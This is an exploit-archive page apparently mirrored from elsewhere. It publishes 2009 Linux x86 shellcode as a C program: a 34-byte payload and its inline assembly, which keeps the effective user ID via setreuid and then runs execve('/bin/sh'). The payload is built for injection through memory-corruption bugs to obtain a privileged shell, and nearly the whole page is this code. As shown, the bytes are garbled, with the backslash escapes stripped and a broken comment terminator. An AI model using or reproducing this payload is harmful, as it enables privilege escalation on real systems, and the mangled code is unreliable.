[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : linux/x86 setreuid(geteuid(),geteuid()),execve("/bin/sh",0,0) 34 bytes
# Published : 2009-06-16
# Author : blue9057
# Previous Title : solaris/x86 portbind/tcp shellcode generator
# Next Title : linux/x86 generate portbind payload
/*
*
* linux/x86 setreuid(geteuid(),geteuid()),execve("/bin/sh",0,0) 34byte universal shellcode
*
* blue9057 root@blue9057.com
*
* /
int main()
{
char shellcode[]="x6ax31x58x99xcdx80x89xc3x89xc1x6ax46"
"x58xcdx80xb0x0bx52x68x6ex2fx73x68x68"
"x2fx2fx62x69x89xe3x89xd1xcdx80";
//setreuid(geteuid(),geteuid());
//execve("/bin/sh",0,0);
__asm__(""
"push $0x31;"
"pop %eax;"
"cltd;"
"int $0x80;" // geteuid();
"mov %eax, %ebx;"
"mov %eax, %ecx;"
"push $0x46;" // setreuid(geteuid(),geteuid());
"pop %eax;"
"int $0x80;"
"mov $0xb, %al;"
"push %edx;"
"push $0x68732f6e;"
"push $0x69622f2f;"
"mov %esp, %ebx;"
"mov %edx, %ecx;"
"int $0x80;" // execve("/bin/sh",0,0);
"");
}
// www.Syue.com [2009-06-16]